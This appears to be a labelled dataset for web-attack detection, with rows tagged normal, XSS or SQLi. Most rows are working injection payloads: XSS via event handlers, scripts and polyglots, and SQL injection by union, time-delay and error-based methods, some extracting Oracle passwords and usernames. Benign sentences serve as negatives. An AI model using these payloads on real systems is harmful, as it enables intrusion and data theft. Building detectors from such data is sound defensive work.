+"a=""get"";b=""URL"";c=""javascript:"";d=""alert('xss');"";eval(a+b+c+d);",1,XSS,1277 +"or SLEEP(5)=""",2,SQLi,10270 +"1%' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and '%' = '",2,SQLi,17156 +"-7940%"" ) union all select 2779,2779,2779,2779,2779,2779,2779,2779,2779,2779#",2,SQLi,20164 +There is simply no point in dividing the spoils among a select few whilst hoping that a few billion onlookers will not notice.,0,normal,25296 +"select count ( * ) from generate_series ( 1,5000000 ) and ""ihbe"" like ""ihbe",2,SQLi,19852 +1' ) ) ) union all select null#,2,SQLi,19903 +"Extra 220% – 220% off select items with code SALE, or $230 off select purchases over $215 with code SALE230.",0,normal,26158 +Select truck.,0,normal,24670 +-9225 ) or ( 8258 = 2726 ) *2726 and ( 9900 = 9900,2,SQLi,14294 +"-2325 ) union all select 4692,4692,4692,4692#",2,SQLi,15060 +"<samp onmouseover=""alert(1)"">test</samp>",1,XSS,2761 +-1277' ) ) ) order by 1--,2,SQLi,12712 +<bdi onfocusout=alert(1) tabindex=1 id=x></bdi><input autofocus>,1,XSS,3659 +--><!--*{color:red} /* all UA */,1,XSS,8957 +"<col ondblclick=""alert(1)"">test</col>",1,XSS,7654 +"1%"" ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ""%"" = """,2,SQLi,15924 +"-3872%"" ) ) ) union all select 1637,1637,1637,1637,1637#",2,SQLi,18267 +Select convey.,0,normal,24719 +"<;/TITLE>;<;SCRIPT>;alert(""XSS"");<;/SCRIPT>;",1,XSS,1577 +"<style onmouseout=""alert(1)"">test</style>",1,XSS,2726 +"1'+ ( select syrz where 7699 = 7699 union all select null,null,null#",2,SQLi,12115 +"1"" ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,14932 +1'|| ( select 'tjzy' where 3037 = 3037,2,SQLi,18927 +"<div id=""92""><div style=""background:url(http://foo.f/f oo/;color:red/*/foo.jpg);"">X</div>//[""'`-->]]>]</div><div id=""93""><div style=""list-style:url(http://foo.f)\20url(javascript:alert(93));"">X</div>//[""'`-->]]>]</div>",1,XSS,9099 +"<input onselect=alert(1) value=""XSS"" autofocus>",1,XSS,100 +Select a fabric for the sewing project.,0,normal,24210 +1'+ ( select 'yjpp' where 8966 = 8966,2,SQLi,13609 +"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""nxvp"" = ""nxvp",2,SQLi,15641 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#",2,SQLi,10340 +Where's the planetarium?,0,normal,23543 +1'|| ( select 'fven' where 1433 = 1433 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) ) ||',2,SQLi,19326 +<meter onblur=alert(1) tabindex=1 id=x></meter><input autofocus>,1,XSS,8811 +I'm planning to pick up some supplies.,0,normal,23833 +That lets you select a charity and then donates 0.5 percent of the purchase price of select products to the charity you picked.,0,normal,25456 +"-7418 union all select 1340,1340,1340,1340,1340#",2,SQLi,19599 +1' and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and 'vwve' like 'vwve,2,SQLi,18393 +select ( case when ( 2501 = 4688 ) then 2501 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,20694 +Where did you find that adorable puppy?,0,normal,23687 +<html onpointerup=alert(1)>XSS</html>,1,XSS,6558 +<input type=checkbox id=x onfocus=alert(1)>,1,XSS,5805 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dialog id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></dialog>",1,XSS,6138 +1%' ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,16724 +"1' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,15220 +<keygen onpointerout=alert(1)>XSS</keygen>,1,XSS,3211 +<spacer onpointermove=alert(1)>XSS</spacer>,1,XSS,6845 +"<input oncut=alert(1) value=""XSS"" autofocus>",1,XSS,3741 +<svg onpointerenter=alert(1)>XSS</svg>,1,XSS,2134 +"1 ) as zqxa where 5718 = 5718 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,17695 +"1"" ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( ""umne"" like ""umne",2,SQLi,21462 +"<div draggable=""true"" contenteditable>drag me</div><nav ondrop=alert(1) contenteditable>drop here</nav>",1,XSS,7709 +Note: The additional savings is only good for select Prime members.,0,normal,25822 +"<figcaption draggable=""true"" ondragleave=""alert(1)"">test</figcaption>",1,XSS,7468 +1' and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and 'ixzr' = 'ixzr,2,SQLi,15007 +Up to 30% off select smart and electronic door locks,0,normal,25181 +<button onpointerover=alert(1)>XSS</button>,1,XSS,3450 +waitfor delay '0:0:20' --,2,SQLi,10827 +"<legend oncopy=""alert(1)"" contenteditable>test</legend>",1,XSS,2027 +"-1174"" union all select 4303,4303,4303,4303#",2,SQLi,17143 +"<td onclick=""alert(1)"">test</td>",1,XSS,5365 +"<style onLoad style onLoad=""javascript:javascript:alert(1)""></style onLoad>",1,XSS,367 +"UNION SELECT @@VERSION,SLEEP(5),""'3",2,SQLi,10512 +Where did you get that delicious dessert from?,0,normal,23821 +"&lt;IMG SRC=\"" javascript&#058;alert('XSS');\""&gt;",1,XSS,1047 +Where can I select a new theme for my website?,0,normal,23861 +"1,iif ( 7475 = 7475,1,1/0 )",2,SQLi,17075 +"javascript:""/*`/*\""/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script>",1,XSS,9443 +<picture onfocusout=alert(1) tabindex=1 id=x></picture><input autofocus>,1,XSS,5737 +"-5224' ) where 1962 = 1962 union all select 1962,1962,1962,1962,1962,1962,1962,1962,1962--",2,SQLi,12118 +ORDER BY 2,2,SQLi,10200 +"1 ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( 5137 = 5137",2,SQLi,20085 +"='><script>alert(""xss"")</script>",1,XSS,1278 +"While you're still online, select the book you want do download.",0,normal,25094 +&#x000003c,1,XSS,1030 +select,0,normal,26580 +"Select maple mahogany shaded back and sides, cellulose bound top, rosewood bridge fitted with compensating saddle.",0,normal,25582 +<ul onpointermove=alert(1)>XSS</ul>,1,XSS,1960 +-3462' ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( 'cxku' like 'cxku,2,SQLi,15200 +"1 ) union all select null,null#",2,SQLi,19417 +<audio onpointerup=alert(1)>XSS</audio>,1,XSS,4206 +1 ) ) as svhd where 9761 = 9761,2,SQLi,16190 +"Be sure to select the correct class of service in order to see qualifying fares for this program — for instance, you won't see these discounts if you select economy class.",0,normal,26289 +"1"" ) where 2758 = 2758 union all select null,null,null,null,null,null,null--",2,SQLi,12438 +"<body onbeforecopy=""alert(1)"" contenteditable>test</body>",1,XSS,5554 +Where's the spiritual healer?,0,normal,23615 +"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i",2,SQLi,11021 +"<option onmousedown=""alert(1)"">test</option>",1,XSS,2335 +"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and 'bnfu' like 'bnfu",2,SQLi,18587 +"<output onmouseenter=""alert(1)"">test</output>",1,XSS,4297 +; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --,2,SQLi,11058 +"In many agencies, the birth mothers select the prospective parents by searching through detailed portfolios that prospective parents have made.",0,normal,25963 +"1"" ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ""qnqb"" like ""qnqb",2,SQLi,17878 +"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23",2,SQLi,10863 +"<SCRIPT/SRC=""%(jscript)s""></SCRIPT>",1,XSS,698 +<strong onpointerout=alert(1)>XSS</strong>,1,XSS,5928 +"select * from users where id = 1 or "",."" or 1 = 1 -- 1",2,SQLi,11362 +1'|| ( select 'vvpn' from dual where 7011 = 7011 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) ) ||',2,SQLi,15560 +"1' in boolean mode ) union all select null,null,null,null,null--",2,SQLi,14565 +end and ( 'unko' = 'unko,2,SQLi,22294 +"1%"" ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( ""%"" = """,2,SQLi,21544 +He decided to order a classic burger.,0,normal,22923 +"1"" ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ""azpb"" = ""azpb",2,SQLi,15714 +Let's choose a location for our next meetup.,0,normal,23713 +"<tr onpaste=""alert(1)"" contenteditable>test</tr>",1,XSS,1805 +"-8772%' union all select 4909,4909,4909,4909,4909,4909,4909,4909,4909#",2,SQLi,13698 +"1"" order by 1--",2,SQLi,17805 +1' ) as fkpn where 1100 = 1100,2,SQLi,20673 +"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) -- rucf",2,SQLi,18850 +<template onpointerover=alert(1)>XSS</template>,1,XSS,2519 +-2527 ) ) as oqpy where 7468 = 7468 or 3038 = 3038,2,SQLi,16704 +1' where 3337 = 3337 and 8403 = 5760,2,SQLi,15789 +"Select the account you just added and press ""A"" on the controller, select ""Sign in,"" and press ""A"" again.6.",0,normal,25564 +"<script onpaste=""alert(1)"" contenteditable>test</script>",1,XSS,8221 +"1"" ) where 4660 = 4660 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,14696 +"1' ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( 'vkde' = 'vkde",2,SQLi,22020 +1' ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( 'trzi' = 'trzi,2,SQLi,19762 +"1' union all select null,null,null,null,null--",2,SQLi,15590 +"<IMG """"""><SCRIPT>alert("""")</SCRIPT>""\>",1,XSS,3590 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nav id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></nav>",1,XSS,5427 +select,0,normal,26535 +"<style>@keyframes x{}</style><svg style=""animation-name:x"" onanimationstart=""alert(1)""></svg>",1,XSS,2055 +"<a onmouseout=""alert(1)"">test</a>",1,XSS,6974 +Plant some vibrant flowers.,0,normal,22667 +select ( case when ( 2294 = 3651 ) then 2294 else 2294* ( select 2294 from information_schema.character_sets ) end ) #,2,SQLi,18332 +Select the ideal candidate.,0,normal,24260 +"( convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 9339 = 9339 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) )",2,SQLi,13182 +-3881 ) ) ) union all select 4438--,2,SQLi,14472 +or 1 in ( select @@version ) --,2,SQLi,11404 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rb id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></rb>",1,XSS,4497 +"admin"" or 1=1",2,SQLi,9894 +-9358' or 9887 = 2569--,2,SQLi,14118 +1'+ ( select bfeq where 3445 = 3445 and 9198 = 9198--,2,SQLi,21877 +"1"" ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( ( ""djwo"" = ""djwo",2,SQLi,13954 +"-6746"" ) or ( 8459 = 8459 ) *4906 and ( ""kohi"" like ""kohi",2,SQLi,14231 +"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--",2,SQLi,10880 +AND 1 = utl_inaddr.get_host_address ( ( SELECT banner FROM v$version WHERE ROWNUM = 1 ) ) AND 'i' = 'i,2,SQLi,11743 +"1"" where 6347 = 6347 union all select null,null,null,null,null,null,null,null#",2,SQLi,14411 +"1' and elt ( 1210 = 1210,sleep ( 5 ) ) and 'ioar' = 'ioar",2,SQLi,12521 +Where should we meet for our date?,0,normal,22938 +"1' ) as ildf where 5545 = 5545 union all select null,null,null,null#",2,SQLi,17838 +&&SLEEP(5)#,2,SQLi,10291 +-3880 ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( 5194 = 5194,2,SQLi,22007 +"select * from users where id = 1.<@$ union select 1,version ( ) -- 1",2,SQLi,11370 +"<div id=""127""><svg xmlns=""http://www.w3.org/2000/svg"" id=""x"">",1,XSS,9062 +<p onpointerover=alert(1)>XSS</p>,1,XSS,6533 +"-5292' ) union all select 1439,1439,1439,1439#",2,SQLi,19726 +"<rtc draggable=""true"" ondrag=""alert(1)"">test</rtc>",1,XSS,3639 +"<link draggable=""true"" ondragend=""alert(1)"">test</link>",1,XSS,7440 +") and 0=benchmark(3000000,MD5(1))%20-- +) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,22436 +"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*",2,SQLi,22503 +1' ) where 1645 = 1645 rlike sleep ( 5 ) --,2,SQLi,14547 + or 1 = 1 --,2,SQLi,11616 +"<style>:target {transform: rotate(180deg);}</style><frame id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></frame>",1,XSS,5538 +<legend onfocusout=alert(1) tabindex=1 id=x></legend><input autofocus>,1,XSS,2939 +<button onFinish=javascript:alert(1)>,1,XSS,9580 +"1"" ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ""rvub"" like ""rvub",2,SQLi,15493 +<input autofocus onblur=alert(1)>,1,XSS,9160 +1'+ ( select 'toec' where 5810 = 5810 and sleep ( 5 ) ) +',2,SQLi,14577 +"<u onmouseleave=""alert(1)"">test</u>",1,XSS,2677 +"-5657' ) ) ) union all select 8071,8071,8071,8071,8071,8071,8071,8071#",2,SQLi,17431 +"1' ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( 'efwq' like 'efwq",2,SQLi,19406 +"1%"" ) ) ) and 1594 = 8757",2,SQLi,20738 +<content id=x tabindex=1 onbeforedeactivate=alert(1)></content><input autofocus>,1,XSS,2300 +Where's the perfect spot for a scenic drive?,0,normal,23705 +"1"" ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( ""awyk"" like ""awyk",2,SQLi,17996 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><td id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></td>",1,XSS,6353 +"In 1549 he was placed on a commission to examine Anabaptists, and in 1551 he was appointed chancellor to Bishop Ridley, select preacher at Canterbury, and a commissioner for the reform of the canon law; in 1552 Coverdale made him archdeacon of Exeter.",0,normal,25986 +column,0,normal,23123 +<content id=x tabindex=1 ondeactivate=alert(1)></content><input id=y autofocus>,1,XSS,6742 +"<area onbeforepaste=""alert(1)"" contenteditable>test</area>",1,XSS,1750 +-3688'|| ( select 'pber' from dual where 7137 = 7137 order by 1#,2,SQLi,13279 +"<content onbeforepaste=""alert(1)"" contenteditable>test</content>",1,XSS,5006 +"<data onbeforecopy=""alert(1)"" contenteditable>test</data>",1,XSS,6502 +"A select guide to cultural events for children, teenagers and families.",0,normal,26373 +"-->'""/></sCript><svG x="">"" onload=(co\u006efirm)``>",1,XSS,9527 +<thead id=x tabindex=1 onfocus=alert(1)></thead>,1,XSS,2493 +"-4772 ) ) ) union all select 3879,3879,3879,3879,3879--",2,SQLi,13851 +Join the dance class.,0,normal,22589 +Select your proposal.,0,normal,24911 +"1%"" ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,15110 +"1"" ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( ""obau"" = ""obau",2,SQLi,18079 +"<footer onmouseup=""alert(1)"">test</footer>",1,XSS,7923 +"1 ) where 9010 = 9010 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,17660 +"<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>",1,XSS,1079 +"1 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) # ehsr",2,SQLi,13876 +Select the best location.,0,normal,24442 +select ( case when ( 1743 = 5698 ) then 1743 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,17355 +1' ) where 2928 = 2928 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,19101 +word1,0,normal,26499 +"1"" and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,17240 +It also includes a FOX live stream in select markets.,0,normal,25931 +"1'|| ( select 'alxi' where 3967 = 3967 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,19307 +%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E,1,XSS,9351 +"<style>:target {color: red;}</style><link id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></link>",1,XSS,3519 +"<option onpaste=""alert(1)"" contenteditable>test</option>",1,XSS,3246 +"Once you learn how to do this, friends and colleagues alike will be clamoring for tips on how to select the best fresh fruits for their home spreads.",0,normal,25789 +1' ) ) as dckd where 1794 = 1794,2,SQLi,13041 +Owners who select the Heritage will be able to select either a Shadow Black paint job in either gloss or matte finish.,0,normal,25752 +"<style>@keyframes x{}</style><base style=""animation-name:x"" onanimationend=""alert(1)""></base>",1,XSS,7570 +"""))) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,10953 +"javascript:alert()//*/alert()/*'-/""/-eval(`(alert())`)//\""-alert()//--></title></style></noscript></textarea></template></noembed><script>alert()</script><frameset onload=alert()><svg/onload=alert(1)> alert()//",1,XSS,9478 +Where's the missing jigsaw piece?,0,normal,22716 +<meter id=x tabindex=1 onfocus=alert(1)></meter>,1,XSS,5014 +Insert the text.,0,normal,22848 +-1354 ) ) or 8571 = 8571--,2,SQLi,21918 +<img id=x tabindex=1 onfocusin=alert(1)></img>,1,XSS,7688 +<wbr onpointerup=alert(1)>XSS</wbr>,1,XSS,5568 +1 rlike ( select ( case when ( 8314 = 5463 ) then 1 else 0x28 end ) ),2,SQLi,18243 +"<footer onmouseleave=""alert(1)"">test</footer>",1,XSS,7295 +"-8129' ) ) ) union all select 4531,4531,4531#",2,SQLi,15466 +Can't select that.,0,normal,24387 +"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) +'",2,SQLi,16071 +Perhaps the earliest example is to be found in Select Views of Literature (1811-1812).,0,normal,25742 +"<hr onmouseup=""alert(1)"">test</hr>",1,XSS,7692 +Check values where applicable.,0,normal,23249 +<svg><shadow onload=alert(1)></shadow>,1,XSS,5164 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#",2,SQLi,10520 +Select carry.,0,normal,24718 +Mr. Trump has yet to select nominees for the vacancies.,0,normal,25832 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menu id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></menu>",1,XSS,4491 +"select * from users where id = 1 union select @<@$,version ( ) -- 1",2,SQLi,11583 +"1"" ) as ipxg where 4031 = 4031 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --",2,SQLi,15482 +"<strike onkeydown=""alert(1)"" contenteditable>test</strike>",1,XSS,4008 +"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*",2,SQLi,22491 +<svg><animatetransform onrepeat=alert(1) attributeName=transform repeatCount=2 dur=1s>,1,XSS,2920 +"1"" ) ) ) union all select null,null,null,null,null,null,null,null--",2,SQLi,13803 +"-5313' ) union all select 7187,7187,7187#",2,SQLi,12924 +"javascript:alert()//</title></style></textarea></noscript></template></noembed><script>alert()</script>-->\"";alert()//"";alert()//';alert()//<script>alert()</script><frame src=""javascript:alert()"">` alert()//<svg/onload=alert()>*/alert()/*",1,XSS,9481 +<i id=x tabindex=1 onactivate=alert(1)></i>,1,XSS,6527 +"select * from users where id = 1 union select @||1,version ( ) -- 1",2,SQLi,11599 +1,0,normal,26491 +"<h1 onmousemove=""alert(1)"">test</h1>",1,XSS,6701 +<time onpointerleave=alert(1)>XSS</time>,1,XSS,4270 +1'|| ( select 'sxya' where 3578 = 3578,2,SQLi,18673 +<audio controls onprogress=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>,1,XSS,30 +"<style>:target {color:red;}</style><abbr id=x style=""transition:color 1s"" ontransitionend=alert(1)></abbr>",1,XSS,8301 +"<datalist ondblclick=""alert(1)"">test</datalist>",1,XSS,4464 +"-7482%"" ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ""%"" = """,2,SQLi,12312 +"1 ) ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,15655 +<strike onpointerover=alert(1)>XSS</strike>,1,XSS,1796 +1' ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( 'izyf' = 'izyf,2,SQLi,16402 +"<select onkeyup=""alert(1)"" contenteditable>test</select>",1,XSS,3608 +"<blink onkeydown=""alert(1)"" contenteditable>test</blink>",1,XSS,7161 +"<style>:target {transform: rotate(180deg);}</style><fieldset id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></fieldset>",1,XSS,3163 +"waitfor delay '0:0:5' and ( ""%"" = """,2,SQLi,15753 +Select your vary.,0,normal,25007 +-8069' ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( 'qbvz' = 'qbvz,2,SQLi,18400 +"<dt onmouseout=""alert(1)"">test</dt>",1,XSS,5223 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#",2,SQLi,10354 +"<hr onkeypress=""alert(1)"" contenteditable>test</hr>",1,XSS,7970 +Where's the nail salon?,0,normal,23584 +"1"" ) as sstd where 9629 = 9629 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,18085 +"1'+ ( select vxax where 9036 = 9036 and elt ( 1210 = 1210,sleep ( 5 ) ) ) +'",2,SQLi,20618 +""" or isNULL ( 1/0 ) /*",2,SQLi,11777 +"For the Apple News app, editors select stories from reliable sources.",0,normal,26129 +Insert the clip.,0,normal,22843 +"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i",2,SQLi,11005 +<image2 onpointerleave=alert(1)>XSS</image2>,1,XSS,2352 +<command onpointerleave=alert(1)>XSS</command>,1,XSS,1891 +Select receive.,0,normal,24664 +"<menu draggable=""true"" ondragenter=""alert(1)"">test</menu>",1,XSS,3994 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><template id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></template>",1,XSS,3071 +"<meter onkeypress=""alert(1)"" contenteditable>test</meter>",1,XSS,7029 +Select hide.,0,normal,24655 +<header onfocusout=alert(1) tabindex=1 id=x></header><input autofocus>,1,XSS,4528 +1'|| ( select 'tcfy' where 4546 = 4546 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ) ||',2,SQLi,19047 +"Open the drop-down menu labeled ""Select the skin you wish Steam to use"" and select your new skin.",0,normal,25770 +"-4984%"" ) ) ) union all select 6980,6980,6980,6980,6980,6980,6980,6980#",2,SQLi,12117 +"<style>@keyframes x{}</style><marquee style=""animation-name:x"" onanimationend=""alert(1)""></marquee>",1,XSS,8558 +-2749' ) as fiho where 3531 = 3531 or 2777 = 1485#,2,SQLi,16000 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--",2,SQLi,10691 +"1 where 7362 = 7362 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,17038 +"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i",2,SQLi,10985 +"-6097%' ) ) union all select 3990,3990,3990,3990,3990,3990--",2,SQLi,17704 +"Select project team Work with specialist support which may include HR, equality advisers, personnel specialists, occupational psychologists, project sponsors.",0,normal,25576 +<img/src=`` onerror=this.onerror=confirm(1),1,XSS,1207 +-9005 union all select 4410#,2,SQLi,19546 +"<kbd onmousemove=""alert(1)"">test</kbd>",1,XSS,5340 +"-7923"" ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ""szct"" = ""szct",2,SQLi,20477 +They'll select the leader.,0,normal,24250 +"-5840' ) or elt ( 1032 = 1032,3623 )",2,SQLi,21295 +1 ) ) as msug where 3503 = 3503 and sleep ( 5 ) #,2,SQLi,13521 +Modify privacy.,0,normal,22784 +"1%' ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,21108 +"1' ) ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ( 'bmzj' like 'bmzj",2,SQLi,18855 +"Pick the ride mode and tap ""Select"" to order your Lyft.",0,normal,25738 +<video 